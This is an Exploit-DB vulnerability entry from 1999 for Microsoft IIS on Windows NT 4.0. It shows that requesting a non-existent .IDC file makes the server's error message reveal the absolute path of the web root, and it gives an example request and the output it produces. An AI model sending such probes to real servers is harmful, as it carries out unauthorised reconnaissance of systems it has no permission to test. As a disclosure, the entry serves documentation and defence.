Microsoft IIS (Windows NT 4.0/SP1/SP2/SP3/SP4/SP5) - '.IDC' Path Mapping

EDB-ID:

19239

CVE:





Platform:

Windows

Date:

1999-06-04


source: https://www.securityfocus.com/bid/299/info

The full physical path name for the IIS web server root directory may be obtained by attempting to view a non-existent .IDC file. The web server will return an error message that lists the absolute pathname of the "missing" .IDC file. 

"http://www.someURL.com/hackme.idc"

will return:

Error Performing Query
Error processing file 'c:\inetpub\scripts\samples\hackme.idc'